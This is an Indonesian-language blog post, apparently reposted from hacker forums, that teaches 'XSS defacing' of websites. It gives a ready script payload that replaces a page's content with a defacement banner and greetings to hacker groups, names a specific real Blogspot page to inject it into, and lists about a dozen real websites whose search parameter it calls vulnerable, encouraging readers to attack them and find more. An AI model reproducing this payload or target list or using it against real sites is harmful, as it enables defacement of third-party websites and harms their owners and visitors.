4/09/2011

Tutorial XSS Defacing for Blogspot or Some Website

Tutorial XSS Defacing for Blogspot or Some Website
langsung aja ,ane mau share tutor hasil copas dari tetangga

Author by : Darkzzzz xcode.or.id

ok tutor nya cekidot :D

oia nih ane kasih liat dulu preview nya -->
Preview wakaka

Copy dulu ye script berikut ini :
Code:
<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has been Defaced By : R@pid<br/>Greetz To : All member Indonesian Hacker | devilzc0de | Indonesian Area | Hacker Newbie <br/>Visit http://indonesianarea.us";</script>

terus coba buka blog nih orang :
Code:
http://f4123n.blogspot.com/2009/01/pengenalan-sistem-komputer-device.html

tunggu sampe loading page nya selesai ,kemudian akan muncul messagebox, dimana kita disuruh masukin nama ,nah paste kodenya di situ & klik ok wakaka

Nah tinggal dicari dech 1000 Blog yang ada kayak begitunya wakaka

Tadi kan Blog, sekarang kita beralih ke Web, Nah gw tadi dapet beberapa Web yang Vulner XSS :pusing: Rata-rata Vulnernya di bagian "Search Enginenya", lumayan kan bisa buat coba-coba XSS Defacing =))

nie contoh link yg vuln :

Code:
http://cfmhn.ca/content/search.html?q=
http://evergreenmagazine.com/content/search.html?q=
http://flowplayer.org/search.html?q=
http://search.trade2cn.com/supply/search.html?q=
http://www.advicenow.org.uk/search.html?q=
http://www.adnpc.net/search.html?q=
http://www.bafta.org/search.html?q=
http://www.geonames.org/search.html?q=
http://www.lander.edu/search.html?q=
http://www.nacro.org.uk/search.html?q=
http://www.paulsmith.co.uk/search.html?q=
http://www.web100.kz/search.html?q=

hajar Marah

Oke silahkan ditambahkan noh, apalagi yang mengenai XSS Worm (Kalo ngartos jangan pelit2)

hehehe

thanks for : http://Xcode.or.id/ and crew
special author : Darkzzzz

sekian dari ane Ganteng

sumber : devilzc0de 
Dishare oleh
Label: